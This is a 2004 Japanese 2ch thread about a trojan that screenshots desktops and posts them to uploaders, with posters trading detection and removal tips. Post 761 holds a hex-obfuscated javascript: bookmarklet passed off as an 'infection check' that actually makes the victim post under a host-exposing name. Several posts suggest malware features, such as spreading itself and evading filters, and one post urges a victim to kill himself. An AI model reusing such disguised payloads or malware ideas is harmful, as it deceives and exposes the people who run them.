670:[名無し]さん(bin+cue).rar
04/09/23 01:37:41 avdWvEQz
ってなに、shareの方でもクリップボード晒しウィルスが出てたんだな
share初のウィルスとは聞いていたが、クリボ晒しとは、なかなかやるじゃないかshare
671:[名無し]さん(bin+cue).rar
04/09/23 01:39:33 62NRg8JO
>>667 ロリ画像の欲望に負けたら踏むさ
>>668 祭り会場にいってみなされ
俺も今更ながら変えたよ 圧縮ファイルにはdelexeとSSMは手放せない
672:[名無し]さん(bin+cue).rar
04/09/23 01:41:38 cDvdfQLH
ってかXPユーザは気付けよ、アイコンが古い事と小さくしたらそのまんま小さくなる点に。
673:[名無し]さん(bin+cue).rar
04/09/23 01:43:20 ntwmMQhY
>>672
同意。
アイコンが全然違う。
674:[名無し]さん(bin+cue).rar
04/09/23 02:32:28 E03v0hA1
オワタ
675:[名無し]さん(bin+cue).rar
04/09/23 02:34:21 mva2OVxj
Share(仮称)__part66
スレリンク(download板:644番)
644 名前:人柱 ◆k2VpQ2TTb. :04/09/23 02:03:52 ID:9E7gEobQ
実は秘密のプログラムには秘密のバックドアが仕掛けてあったって知ってた?
京都府警のところにいってるよん。
676:[名無し]さん(bin+cue).rar
04/09/23 02:40:20 oBodvraO
まず作者は
・うp炉だを多数の中からランダムに
・キャプチャ以外もうp。できればkakikomi.txt
・繁殖機能
これよろしく
677:[名無し]さん(bin+cue).rar
04/09/23 02:41:48 yDWoB56M
Rock54対策も重要だな
678:[名無し]さん(bin+cue).rar
04/09/23 02:47:20 biKrCHPF
2chのそれっぽいスレでURL検索
対応うpろだCGI検出
特殊なファイル名でうp
うpファイル名を調べて同種ウィルスによるうp数が一定以上ならば
新たなうpろだ探し
複数のうpろだCGIに対応しておけばそれなりに
強固だと思ふ
679:[名無し]さん(bin+cue).rar
04/09/23 02:47:44 mmGHQUsE
あ~面白かった。三日分は笑ったな。
680:[名無し]さん(bin+cue).rar
04/09/23 02:51:47 XmzjVHkd
exe ファイル 捨てたい
681:[名無し]さん(bin+cue).rar
04/09/23 02:52:48 oBodvraO
自身をうpろだに名前変えまくってうpしまくり
はやめてね
困るから
682:[名無し]さん(bin+cue).rar
04/09/23 02:59:52 EETLBaqB
苺キンタマに感染したかどうかは
どうやってわかるの?教えてエロい人
683:[名無し]さん(bin+cue).rar
04/09/23 03:00:29 LvJ+JBBu
苺ウィルスワラタw
なんだこりゃ
684:[名無し]さん(bin+cue).rar
04/09/23 03:05:04 LvJ+JBBu
それにしてもよくもいろいろと考えつくものだ
685:[名無し]さん(bin+cue).rar
04/09/23 03:05:08 IFT2b9V5
>>682
タスクマネージャひらいてプロセス見て、
なかにshellsystem.exeってのがあったらアウト。
686:[名無し]さん(bin+cue).rar
04/09/23 03:12:36 LvJ+JBBu
>>682
つーか、exe実行したの?実行してないなら9割9分平気。
687:[名無し]さん(bin+cue).rar
04/09/23 03:19:35 EETLBaqB
>>685
アリガトウ。感染してないみたいだ。良かった
>>686
してないと思う。
688:[名無し]さん(bin+cue).rar
04/09/23 03:29:09 xduUn+v/
作りこんではあるが、洗練されてない
不必要なコードがいっぱいあるけど、なんでやろ。
URLリンク(www.ff.iij4u.or.jp)
ここからターゲット(おすすめ、チャット、特別企画、ツール類、運営案内など)を選択、
FROM=%s&mail=%s&MESSAGE=%s&bbs=%s&key=%s&time=%s&submit=%sで、メル欄に回数
subject=%s&FROM=%s&mail=%s&MESSAGE=%s&bbs=%s&time=%s&submit=%s、スレ作成機能
form-data /upload/c=03okari/confirm.cgi
up.isp.2ch.net URLリンク(up.isp.2ch.net) この辺で取得して書きコ
Software\Meropa ??なんだろこのディレクトリ
Software\Microsoft\Windows\CurrentVersion\Run 投下先
Software\Microsoft\Microsotf 何か投下
フォルダアイコンはbitmapをそのまま使ってるから変なんだな
逆アセも簡単そうなので、環境持ってると............
パラメータを変えるだけで、感染能力含め、かなりいろいろなことができるように作ってある
いわば、キンタマメイカーのようなものか?
689:[名無し]さん(bin+cue).rar
04/09/23 03:30:41 yEjCkAsP
カキコの内容少し弄るだけで又2chに投稿されるようになるしな
690:[名無し]さん(bin+cue).rar
04/09/23 03:33:43 62NRg8JO
将来のために余裕を持って設計してあるってことか…
691:[名無し]さん(bin+cue).rar
04/09/23 03:35:48 MBxbzncs
まだまだ祭りは続きそうだ
692:[名無し]さん(bin+cue).rar
04/09/23 03:39:42 9fWyBJ/z
今日はネットをしていなかった
今更ながらウィルスの存在を知った。
さっそく調べて行って見た。
関さんが面白いと思った。
693:[名無し]さん(bin+cue).rar
04/09/23 03:39:47 qx0T+sDR
キンタマ騒ぎがあってよかーたと重田
694:[名無し]さん(bin+cue).rar
04/09/23 04:09:24 LvJ+JBBu
>>690
いくらでも亜種が作れるってことだろうな
695:[名無し]さん(bin+cue).rar
04/09/23 04:12:23 rtwkFYAH
>>685
タスクマネージャのプロセスから削除だけじゃダメなの?
696:[名無し]さん(bin+cue).rar
04/09/23 04:19:45 kOQgldzO
当たり前だろ…
697:[名無し]さん(bin+cue).rar
04/09/23 04:21:34 rtwkFYAH
やっぱりだめか
698:[名無し]さん(bin+cue).rar
04/09/23 04:23:04 qaAkrrtW
再起動したら復活するし
699:[名無し]さん(bin+cue).rar
04/09/23 04:25:47 Y5vbHsBs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
ここら辺もregeditで見とけよ
700:[名無し]さん(bin+cue).rar
04/09/23 04:27:59 rtwkFYAH
shellsystem.exe以外は無視してOK?
あとノートンで遮断した場合は画像は流れない?
701:[名無し]さん(bin+cue).rar
04/09/23 04:34:09 XZhKNgqY
なんだか調子に乗って改造した奴が先に逮捕されそう
702:[名無し]さん(bin+cue).rar
04/09/23 04:37:36 rMURrwFg
牛に我慢させるか
703:[名無し]さん(bin+cue).rar
04/09/23 04:40:22 EiFN9IZi
誤爆だ わりぃ
704:[名無し]さん(bin+cue).rar
04/09/23 04:44:18 62NRg8JO
これならとってもわかりやすい画像ですな
URLリンク(v.isp.2ch.net) もう典型的かと
705:[名無し]さん(bin+cue).rar
04/09/23 04:58:57 MZi2DiBQ
これxp以外は平気なの?
706:[名無し]さん(bin+cue).rar
04/09/23 04:59:21 SFKAhjW3
ノートンインターネットセキュリティの様なものが常駐してたら
プログラムによって勝手に晒されるようなことは無いよな?
707:[名無し]さん(bin+cue).rar
04/09/23 05:00:55 JtMoVLJN
URLリンク(plaza.rakuten.co.jp)
708:[名無し]さん(bin+cue).rar
04/09/23 05:02:56 g70Ywgh6
>>705
どうしてそういう結論になるのかが判らん。
>>706
設定次第。学習モードとかでユーザが勝手な通信を許可したら、
なんぼセキュリティソフトが入っててもそりゃアウトにもなる。
709:[名無し]さん(bin+cue).rar
04/09/23 05:04:36 Q7dG25BA
アップローダから知らないファイル落としたりしなきゃ、感染しないんだよな?
こうもいっぱいかかってると、最近何も落としてないのに不安になる
710:[名無し]さん(bin+cue).rar
04/09/23 05:04:47 MZi2DiBQ
>>708
ボロPCで感染実験してみたのさ(OS ME)
そんで晒されるか待ってるだけど、一向にうpされないんでつよ。
711:[名無し]さん(bin+cue).rar
04/09/23 05:05:29 4TL6YJ26
まぁ拡張子表示はしっかりしとけってこったな
712:[名無し]さん(bin+cue).rar
04/09/23 05:09:58 xduUn+v/
>>705
苺キンタマ(仮)は、Windows 98以降なら感染というか、踏んだら効果を示す
>>706
httpを使うからWebが見られる環境ならアウト(f/wで80番閉じてれば別だが、web見られないよ)
713:[名無し]さん(bin+cue).rar
04/09/23 05:10:25 5x3EooTF
URLリンク(v.isp.2ch.net)
貴様ッ見ているな!
714:[名無し]さん(bin+cue).rar
04/09/23 05:13:40 MZi2DiBQ
windows\shellsystem.exeはあったんだけど
レジストリは追加されてないんだよね
これじゃまだ感染しとらんのかね?
もう一回踏んでみるかな。。。
715:[名無し]さん(bin+cue).rar
04/09/23 05:14:27 57yhE0eV
PFW入れてれば、ウィルスが通信しようとしたのを検知してくれるんじゃないかい
何でもOKで通してれば意味無いけど
あと、SP2のPFWはアウトバウンド検知してくれないんだっけ?
716:[名無し]さん(bin+cue).rar
04/09/23 05:18:37 aY8YkHOS
URLリンク(strawberry.web-sv.com)
トロイらしいんだけど、だれか解析頼む。
717:[名無し]さん(bin+cue).rar
04/09/23 05:19:45 xduUn+v/
>>715
ウイルスというか、現時点ではトロイなんだが
通信といっても、書き込みと変わらんからf/wでの検知は難しい
XP SP2のf/wは、外→内のみ。
718:[名無し]さん(bin+cue).rar
04/09/23 05:25:36 JsiucGEH
結局はキンタマと同じでexeを実行しなければいいってことだけど
XPは標準で表示しないしな。
何でこんな仕様なんだorz
ところでアップローダスレを自分のユーザ名で検索してしまった香具師
ノシ
719:[名無し]さん(bin+cue).rar
04/09/23 05:25:48 eq0QK75x
俺もサンプルとして捕獲しておきたいんだが、苺1の1360の三点セットってやつでいいんだよね。
720:[名無し]さん(bin+cue).rar
04/09/23 05:27:02 Ypzo5dny
ってかny関係ないじゃん・・・
721:[名無し]さん(bin+cue).rar
04/09/23 05:28:00 0ylh05j4
スレタイでややこしくなってるね
722:[名無し]さん(bin+cue).rar
04/09/23 05:28:17 57yhE0eV
>>717
普通のPFWってEXEファイル単位で通信を検知して知らせてくれんじゃないの?
ループバックでも利用してない限りは大丈夫だと思うが
723:719
04/09/23 05:29:12 eq0QK75x
OK、これであってたようだ。
724:[名無し]さん(bin+cue).rar
04/09/23 05:29:54 MqBRPt/h
>httpを使うからWebが見られる環境ならアウト(f/wで80番閉じてれば別だが、web見られないよ)
>f/w
725:[名無し]さん(bin+cue).rar
04/09/23 05:33:52 Pi3bt/OK
おもしろそいので俺も捕獲しとこ
726:[名無し]さん(bin+cue).rar
04/09/23 05:34:21 AH6SroMo
さて、キンタマと違って
特定のサイトやアップローダーに書き込みを行う以上
そこから業務妨害で損害賠償請求されてもおかしくないトロイなんだが
ま、日本の警察じゃ作成者を特定できんだろうな・・・
でも、苺にexeファイルをアップした人間を特定して締め上げればいいのか?
727:[名無し]さん(bin+cue).rar
04/09/23 05:34:22 Pi3bt/OK
間違え;y=ー( ゚д゚)・∵. ターン
728:[名無し]さん(bin+cue).rar
04/09/23 05:50:14 U98tvZkV
要望まとめ
・複数のうpろだをランダムに使うように(2ちゃんねるアップローダーはやめれ)
・デスクトップ画像以外もうpするように(kakikomi.txtとか)
・繁殖機能。zipで適当なファイルといっしょにウィルス本体も固めてうp。
・Rock54対策。NGワードが含まれる書き込みが規制されるから晒しテンプレを複数作れば大丈夫か?
729:[名無し]さん(bin+cue).rar
04/09/23 05:50:39 VGKgqq6T
なんで怪しいexeファイルを実行すんのかなって思ってたけど
拡張子を表示しない設定だと初心者はわからんわな~
730:[名無し]さん(bin+cue).rar
04/09/23 05:52:17 IFT2b9V5
>>728
要望するなよ(笑)
731:[名無し]さん(bin+cue).rar
04/09/23 05:52:23 4TL6YJ26
セキュリティに対する意識ってなかなかあがらないな
732:[名無し]さん(bin+cue).rar
04/09/23 05:54:24 fgnK5pHv
>>728
共犯者キタ━━━(゚∀゚)━━━ !!!!!
733:[名無し]さん(bin+cue).rar
04/09/23 05:56:44 tcoLxpqV
人間のロリ好きってアニメ、ゲームも好む傾向があるんだな。
なかなか興味深かった。
734:[名無し]さん(bin+cue).rar
04/09/23 05:58:31 cTDJ+/Lv
kakikomi晒されたら辛いな
他の情報で個人割れてたらきっと死人が出る
735:[名無し]さん(bin+cue).rar
04/09/23 06:07:00 JsiucGEH
exeごとに通信制御するNortonとかのFWは
ポート80番使ってようとブロックするんじゃないの?
736:[名無し]さん(bin+cue).rar
04/09/23 06:09:13 IFT2b9V5
>>735
する。というか、初物がソケットひらこうとしたときに騒ぐ。
737:[名無し]さん(bin+cue).rar
04/09/23 06:10:23 0ylh05j4
で、エロの魔力で許可するをクリック!
738:[名無し]さん(bin+cue).rar
04/09/23 06:18:26 0jfdhz8j
簡易プロテクト?
C:\WINDOWS>copy notepad.exe shellsystem.exe
C:\WINDOWS>attrib +R shellsystem.exe
とりあえず実験用の98SE環境ではうまくいった。
メインマシンで実験する度胸はないので、XPなどでは不明。
739:[名無し]さん(bin+cue).rar
04/09/23 06:25:02 J6w/KxT0
これ犯人たどれるだろ。ネットカフェとかかな?
740:[名無し]さん(bin+cue).rar
04/09/23 06:26:03 IFT2b9V5
>>739
踏み台はさまってたら無理
741:[名無し]さん(bin+cue).rar
04/09/23 06:29:08 J6w/KxT0
>>740
プロバイダに問い合わせりゃアクセス記録のこってんじゃないの?
742:[名無し]さん(bin+cue).rar
04/09/23 06:32:12 IFT2b9V5
>>741
ドコのプロバイダに問い合わせるの?
743:[名無し]さん(bin+cue).rar
04/09/23 06:32:29 JsiucGEH
海外プロキシを多段でかましてればよほどのことがないと
たどれてもたどらないと思う。
744:[名無し]さん(bin+cue).rar
04/09/23 06:35:42 J6w/KxT0
>>742
踏み台のだよ。
745:[名無し]さん(bin+cue).rar
04/09/23 06:38:02 IFT2b9V5
>>744
もし俺が犯人だったとしたら、踏み台にしろ串にしろ
一段ではやらないだろうね。捕まりたくないし。
746:[名無し]さん(bin+cue).rar
04/09/23 06:40:16 xduUn+v/
>>739
追求のキーになるのが >>688で報告した
> Software\Meropa ??なんだろこのディレクトリ
なんだが、こんなディレクトリを作るアプリは、かなーり特殊な
半導体設計用のものらしい。こんなの入れてる人間は国内では限られる。
ここから手繰るのがよさげ。スキルは相当と思えるので、配布元から掘るのは難しそう
747:[名無し]さん(bin+cue).rar
04/09/23 06:40:33 J6w/KxT0
>>745
俺がもし被害者だったら100段くらいまでは頑張ってたどるよw
この手のウイルスは犯人が殺されても不思議じゃないと思うんだが。
748:[名無し]さん(bin+cue).rar
04/09/23 06:44:13 xduUn+v/
>>747
そこいらに、いくらでもある
WEP無効の無線LANを踏み台にしてたら、
多段串・海外串なんか使わなくても
たどるのは難しい。
749:[名無し]さん(bin+cue).rar
04/09/23 06:44:40 J6w/KxT0
殺されるは言い過ぎかw でもなんらかの報復は受けると思う。
つーか踏み台に時限セットされたものなら辿るの不可能っぽいな・・
750:[名無し]さん(bin+cue).rar
04/09/23 06:45:30 zW53Q5jb
ネカフェで時限式アップロードするように仕込んだとか。
751:[名無し]さん(bin+cue).rar
04/09/23 06:46:34 99Ier2R9
頑張れ。
752:[名無し]さん(bin+cue).rar
04/09/23 07:02:00 CBy0Cio6
こうゆうのを見ると2chやnyする人ってヒッ●ーだけなのかなって思うね
URLリンク(v.isp.2ch.net)
ウイルスに気づかずに必死に抜いている人1名w
753:469
04/09/23 07:04:35 kh8TR4yq
これって本人達が寝てる間は安全なんだね。
754:[名無し]さん(bin+cue).rar
04/09/23 07:08:11 kh8TR4yq
数字消すの忘れた・・・_| ̄|○
755:[名無し]さん(bin+cue).rar
04/09/23 07:08:12 CBy0Cio6
どうせなら、SS、PC名だけじゃなくて、
IP・ホストも晒してほしかったな
756:[名無し]さん(bin+cue).rar
04/09/23 07:12:12 IFT2b9V5
>>752
これは狙ってやってる気がしないではないな(笑)
757:[名無し]さん(bin+cue).rar
04/09/23 07:45:55 CtAJ3p7u
俺はこんなウイルスは怖くて作れないな
何が怖いって狙われるのが怖いね
作った奴は絶対に捕まらないと思ってるんだから
本気になって追ってみたら面白いことになるかも
例えばウイルス作者が警察だったりしたらヤバイだろうし。
そうじゃなくても作った奴は確実に追われた後人生終わるだろうし
そんな一世一代の大事俺は出来ない
758:[名無し]さん(bin+cue).rar
04/09/23 08:14:59 wZ9Gu9IX
新種ウイルスと聞いてきました
759:[名無し]さん(bin+cue).rar
04/09/23 08:15:35 iqYKdWhe
面白い事考える奴もいるもんだな
760:[名無し]さん(bin+cue).rar
04/09/23 08:18:41 U98tvZkV
Winnyは関係ないけどな。
今やってるのはShareで回ってるふしあなで2ch書き込みと半虹の苺キンタマ
761:[名無し]さん(bin+cue).rar
04/09/23 08:25:55 U98tvZkV
便乗してこれまで流行ってる
JavaScript:document.body.innerHTMLのガイドライン2
スレリンク(gline板:595-586番)
感染確認するには
2ch専用ブラウザを使用している人は、IEなどの一般的なブラウザでこのスレを開いておく。
1、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b
46524f4d2e76616c75653d2766757369616e6173616e273b4d455353414
7452e76616c75653d275c75333045445c75333045415c75373533425c75
353043465c75333034465c75333036305c75333035355c7533303434273
b7375626d69742e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+=
'%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。
2、 改行を外して1行にする。
3、 1行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。
4、 Enterを押す(もしくは「移動」をクリックする)。
エラーが出れば感染してます
762:[名無し]さん(bin+cue).rar
04/09/23 08:26:46 U98tvZkV
>>761
参照間違えた・・
スレリンク(gline板:595-596番)
763:[名無し]さん(bin+cue).rar
04/09/23 08:27:19 1gUyhrM3
764:[名無し]さん(bin+cue).rar
04/09/23 08:51:04 SPCjNc3y
俺はペケピーがはじめての初心者だが、拡張子表示は真っ先にやったぞ…。
まぁ、かつては黒羊とメールストームをふんだ苦い経験持ちだが。
765:[名無し]さん(bin+cue).rar
04/09/23 09:07:42 SY1J+4JW
>>761
ワロタ
ロリ画像ですか
766:[名無し]さん(bin+cue).rar
04/09/23 09:08:11 GmtpX3PS
【使用OS】WinXP
【WindowsUpdateしてるか】はい。
【AntiVirusは】 ??
【ちゃんとUpdateしてるか】??
【スキャンした結果】オンラインにてスキャン
【オンラインスキャンしたならその結果は】いつもなら数個出るのに、不自然なぐらい何も検出されませんでした。
【Winnyのバージョン】使ってません。ネットでウィルス貰いました。
【Winny歴、総DL量は】 無し
【テンプレを読んだか】 はい。
【テンプレにある対策を実行したか】 実行しました。特に何も無かったです。
【症状か具体的に、分かる限りすべて書く】 何となく、重い。動作が鈍い。
【何をしたらそんなことになったのか】 うpされてたファイルを開いたら。
【これまでにとった措置】オンラインスキャンのみ。
767:[名無し]さん(bin+cue).rar
04/09/23 09:12:14 U98tvZkV
>>766
(写真集) (ロリータ) 水原友里.exe
(写真集) (ロリータ) 相田香奈子.exe
コピー ~ (写真集) (ロリータ) 河瀬菜美.exe
どれか開いた?
768:[名無し]さん(bin+cue).rar
04/09/23 09:19:52 Jz5Ghtix
キンタマ作った香具師、逮捕されたのか
769:[名無し]さん(bin+cue).rar
04/09/23 09:25:30 GmtpX3PS
>>767
開いたというか、ダブルクリックして開こうとした。
どれだったか覚えてない…。多分、2回ぐらい開こうとした。
何か怪しかったし、急にPCの反応がおかしくなったから、速攻電源切りました。
その後にまた起動して、全部ゴミ箱に捨てて、ゴミ箱も空にしました。
770:[名無し]さん(bin+cue).rar
04/09/23 09:28:46 kh8TR4yq
>>769
もう遅いw
とりあえず↓に来い。
削除の方法が分かるかもしれない。
アップローダーってずるい
スレリンク(ascii2d板)
771:[名無し]さん(bin+cue).rar
04/09/23 09:28:49 j/Jnnczc
>>769
今すぐネットを切断
C:\WINDOWSフォルダの中でshellsystem.exeを消せ
再起動して後は知ってるならレジストリの自動実行の辺りを探せ
急げ
772:[名無し]さん(bin+cue).rar
04/09/23 09:29:12 U98tvZkV
>>769
とりあえずユーザ名とコンピュータ名を晒せ。
マイコンピュータのプロパティから見れる。
773:[名無し]さん(bin+cue).rar
04/09/23 09:30:19 afWjuRcq
>>766
ご愁傷様
774:[名無し]さん(bin+cue).rar
04/09/23 09:30:56 0ylh05j4
>>685
を見て確認してみ
775:[名無し]さん(bin+cue).rar
04/09/23 09:41:27 P9SKfCRL
>>762
596 名前:水先案名無い人[sage] 投稿日:04/09/21(火) 22:21:33 ID:aLtl7+rE<
>>595のやつやると名前欄fusianasan、本文ロリ画像くださいで勝手に投稿されるってわけか?
597 名前:水先案名無い人[] 投稿日:04/09/21(火) 23:16:48 ID:raTTdWET<
16進でご苦労な事だ。
598 名前:p29d3b8.urawac00.ap.so-net.ne.jp[] 投稿日:04/09/21(火) 23:18:09 ID:ItaWKNCP<
ロリ画像ください
599 名前:水先案名無い人[sage] 投稿日:04/09/21(火) 23:18:27 ID:ItaWKNCP<
orz
600 名前:水先案名無い人[sage] 投稿日:04/09/22(水) 00:18:50 ID:8s+8uxdE<
おらは投稿確認が出て助かっただ
601 名前:水先案名無い人[sage] 投稿日:04/09/22(水) 01:00:01 ID:A3RcQubp<
そいえば、たいていの掲示板ってhttpだからポストする時に
暗号化されていないデータが云々のダイアログを出せるはずだが、
それを解除してる人って結構多いみたいだね。
602 名前:zaq3d2e96f7.zaq.ne.jp[] 投稿日:04/09/22(水) 02:42:09 ID:nVW0EyTb<
ロリ画像ください
603 名前:濡れ衣 zaq3d2e96f7.zaq.ne.jp ◆SbICHIROZ6 [sage] 投稿日:04/09/22(水) 02:43:59 ID:nVW0EyTb<
570はどうなるかちゃんと書いておいてくれよ。。
リモホ晒すのは構わないけど、テストスレになっちまうぞ
604 名前:水先案名無い人[sage] 投稿日:04/09/22(水) 03:55:11 ID:7PnzxniJ<
いかん、笑いが止まらんw
やらんでよかったw
776:[名無し]さん(bin+cue).rar
04/09/23 09:47:30 tcoLxpqV
ノートンでスキャン中の画像がよく晒されてたけど
対策ソフト入れてると安心するから簡単に引っかかるんじゃないの。
しかもこういう祭り時には無力。全くの無駄金だな。
777:[名無し]さん(bin+cue).rar
04/09/23 09:53:59 qlyssBj7
拡張子表示は鬱陶しいし、長いスペースとかがあるから詳細表示のファイルの種類で判断してるなぁ
778:[名無し]さん(bin+cue).rar
04/09/23 09:55:34 GmtpX3PS
>>771
そのレジストリとやらは良く分からんが…
まあ、とりあえず初心者板で聞いてくる。
検索したらshellsystem.exeが見付かった。
とりあえず、急ぎます。ありがとう。
779:[名無し]さん(bin+cue).rar
04/09/23 09:57:12 cDvdfQLH
>拡張子表示は鬱陶しい
ハァ?
780:[名無し]さん(bin+cue).rar
04/09/23 10:00:05 /EYVc77v
明かされてる画像みても無害?
781:[名無し]さん(bin+cue).rar
04/09/23 10:01:16 xduUn+v/
いくらノートン先生でも、登場したてのトロイにすぐには反応できませんぜ
今回の作成日時は、3本とも22日15:57 流されたのが夕方としても、まだ
10時間しかたってない。しかも踏んでるやつ大杉。
作者も、これほどの効果を期待してなかっただろーな。そうでなきゃアプロダ
が落ちるというのも考慮してると思う。この反応からして、ここ数日間に数種の
亜種が出てくると思う。トロイの改変も楽勝っぽいので、便乗犯も多そう。
一番のセキュリティホールは、ユーザーの意識だもんよ。
782:[名無し]さん(bin+cue).rar
04/09/23 10:03:05 Ze0M08FR
ちなみにキンタマが発見されたのが3月半ば。対応は3月末。
783:[名無し]さん(bin+cue).rar
04/09/23 10:03:32 kDRZUavo
歴史は繰り返す。
784:[名無し]さん(bin+cue).rar
04/09/23 10:05:29 4TL6YJ26
そして人は学ばない
785:[名無し]さん(bin+cue).rar
04/09/23 10:07:05 7loVoFeI
mp3の名前などを勝手にいじるウィルスってあります?
786:[名無し]さん(bin+cue).rar
04/09/23 10:08:25 LvJ+JBBu
>>729
アイコンでわかるだろ?
787:[名無し]さん(bin+cue).rar
04/09/23 10:12:17 kDRZUavo
>>786
アイコンがフォルダアイコンに偽装されてるから無知が実行する。
788:[名無し]さん(bin+cue).rar
04/09/23 10:16:24 qJ0+JsGI
で、誰かウイルス駆除ソフト屋さんに報告したの?
789:[名無し]さん(bin+cue).rar
04/09/23 10:23:29 iqYKdWhe
>>780
画像自体は無害。
って、こんな程度の知識の人が踏むんだろうなぁ。
790:[名無し]さん(bin+cue).rar
04/09/23 10:29:04 ky5A4Ls4
>>789
URLリンク(www.microsoft.com)
こんなのがあるから一概には大丈夫とは言えないかもしれない
791:[名無し]さん(bin+cue).rar
04/09/23 10:30:06 0lvmtZMl
>>789
っていう、おまえも相当やばいのだが
792:[名無し]さん(bin+cue).rar
04/09/23 10:32:33 cDvdfQLH
>>789
,、ァ
,、 '";ィ'
________ /::::::/l:l
─- 、::::;;;;;;;;;`゙゙''‐ 、 __,,,,......,,,,_/:::::::::/: !|
. : : : : : : `゙'ヽ、:::゙ヾ´::::::::::::::::::::::`゙゙゙'''‐'、. l| またまた ご冗談を
、、 . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ! ,、- 、
.ヽ:゙ヽ; : : : : : :ノ:::::::::::::::::::::;;、-、、゙::: rー-:'、 / }¬、
. \::゙、: : : :./::::::::::::::;、-''":::::::::: ,...,:::,::., :::':、 _,,/,, ,、.,/ }
ヽ:ヽ、 /::::::::::::::::::::::::: _ `゙''‐''" __,,',,,,___ /~ ヾ::::ツ,、-/
`ヽ、:::::::::;;;、、--‐‐'''''',,iニ- _| 、-l、,},,  ̄""'''¬-, ' ''‐-、 .,ノ'゙,i';;;;ツ
_,,,、-‐l'''"´:::::::' ,、-'" ,.X,_,,、-v'"''゙''yr-ヽ / ゙゙'ヽ、, ,.' j゙,,, ´ 7
,、-''" .l:::::::::::;、-''" ,.-' ゙、""ヾ'r-;;:l 冫、 ヽ、 / __,,.ノ:::::ヽ. /
l;、-'゙: ,/ ゞ=‐'"~゙゙') ./. \ / '''"/::::;:::;r-''‐ヽ
,、‐゙ ヽ:::::..,.r'゙ ,,. ,r/ ./ ヽ. ,' '、ノ''" ノ
,、‐'゙ ン;"::::::. "´ '゙ ´ / ゙、 ,' /
' //::::::::: {. V /
/ ./::::::::::::: ', / /
. / /:::::::::::::::::. ',. / ,.、 /
793:[名無し]さん(bin+cue).rar
04/09/23 10:35:22 iqYKdWhe
>>790-792
いやあ、もちろんgdiplus.dllは知ってますって。わざわざ書かなくていいかと思ったんだけど。
こんなにレスが付くとは…。
794:[名無し]さん(bin+cue).rar
04/09/23 10:36:31 cDvdfQLH
>>793
,、ァ
,、 '";ィ'
________ /::::::/l:l
─- 、::::;;;;;;;;;`゙゙''‐ 、 __,,,,......,,,,_/:::::::::/: !|
. : : : : : : `゙'ヽ、:::゙ヾ´::::::::::::::::::::::`゙゙゙'''‐'、. l| またまた ご冗談を
、、 . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ! ,、- 、
.ヽ:゙ヽ; : : : : : :ノ:::::::::::::::::::::;;、-、、゙::: rー-:'、 / }¬、
. \::゙、: : : :./::::::::::::::;、-''":::::::::: ,...,:::,::., :::':、 _,,/,, ,、.,/ }
ヽ:ヽ、 /::::::::::::::::::::::::: _ `゙''‐''" __,,',,,,___ /~ ヾ::::ツ,、-/
`ヽ、:::::::::;;;、、--‐‐'''''',,iニ- _| 、-l、,},,  ̄""'''¬-, ' ''‐-、 .,ノ'゙,i';;;;ツ
_,,,、-‐l'''"´:::::::' ,、-'" ,.X,_,,、-v'"''゙''yr-ヽ / ゙゙'ヽ、, ,.' j゙,,, ´ 7
,、-''" .l:::::::::::;、-''" ,.-' ゙、""ヾ'r-;;:l 冫、 ヽ、 / __,,.ノ:::::ヽ. /
l;、-'゙: ,/ ゞ=‐'"~゙゙') ./. \ / '''"/::::;:::;r-''‐ヽ
,、‐゙ ヽ:::::..,.r'゙ ,,. ,r/ ./ ヽ. ,' '、ノ''" ノ
,、‐'゙ ン;"::::::. "´ '゙ ´ / ゙、 ,' /
' //::::::::: {. V /
/ ./::::::::::::: ', / /
. / /:::::::::::::::::. ',. / ,.、 /
795:[名無し]さん(bin+cue).rar
04/09/23 10:37:15 iqYKdWhe
んー、でもよく考えると俺が間違ってるな。MSのGDI+の事も書けばよかった。
796:[名無し]さん(bin+cue).rar
04/09/23 10:37:27 xduUn+v/
今回のに限っていえば、晒されてるjpegは今のとこ無害だからな。
便乗してアプロに仕込むやつもいそうだが
797:[名無し]さん(bin+cue).rar
04/09/23 10:41:34 xduUn+v/
つーか、GDI+対策しないで、今頃jpeg開く香具師が悪いと思われ
パッチがあがった時点から危険度急上昇だぞ
798:[名無し]さん(bin+cue).rar
04/09/23 10:42:55 EMRLV6EZ
jpgで感染!?(゚д゚)すんのかよ!?
799:[名無し]さん(bin+cue).rar
04/09/23 10:45:36 LvJ+JBBu
>>798
するよ~、jpg見るどころか、うpロダ逝ったら即感染ですよ
怖いよ~ウィルスわ
800:[名無し]さん(bin+cue).rar
04/09/23 10:52:21 ky5A4Ls4
まあ、SP2な俺には関係ないが
801:[名無し]さん(bin+cue).rar
04/09/23 10:54:42 iqYKdWhe
>>798
まだしてないなら、すぐWindowsUpdataした方がいいよ。
って、「重要なパッチは、もうすでに当ててるだろ?」って認識で話するのは、やっぱり
やめた方がよさそうだな。そこが間違ってた。それに今後も新しく判明した画像処理の
脆弱性をついたウィルスが、現れない保証もない。これからは画像も油断できないと
言う事か。
802:[名無し]さん(bin+cue).rar
04/09/23 10:55:44 jZRbqOye
>>801
SP2を入れると不具合出そうで恐いよ~。
803:[名無し]さん(bin+cue).rar
04/09/23 10:56:54 ky5A4Ls4
URLリンク(www.openwall.com)
とりあえずテストページ。ここの"I am ready to die."を踏んでクラッシュしたら
SP2を当てるかWindowsUpdateしないと危険。ちなみにノートソが反応するから、
ウイルス対策ソフト入れてる人は安心してもいいかもしれない
804:[名無し]さん(bin+cue).rar
04/09/23 11:07:06 EMRLV6EZ
2chブラウザのjpg垣間見機能でもだめか?
805:[名無し]さん(bin+cue).rar
04/09/23 11:12:11 jZxILG0u
>766
LANケーブル抜いてネット切断、それで首吊れ
806:[名無し]さん(bin+cue).rar
04/09/23 11:12:12 zW53Q5jb
苺きんたま対策(仮)
URLリンク(www.geocities.jp)
まとめサイトできたようだ
807:[名無し]さん(bin+cue).rar
04/09/23 11:14:52 2DsdDYOp
>>469
ダウンロードできないんだけど、もう削除されたかな?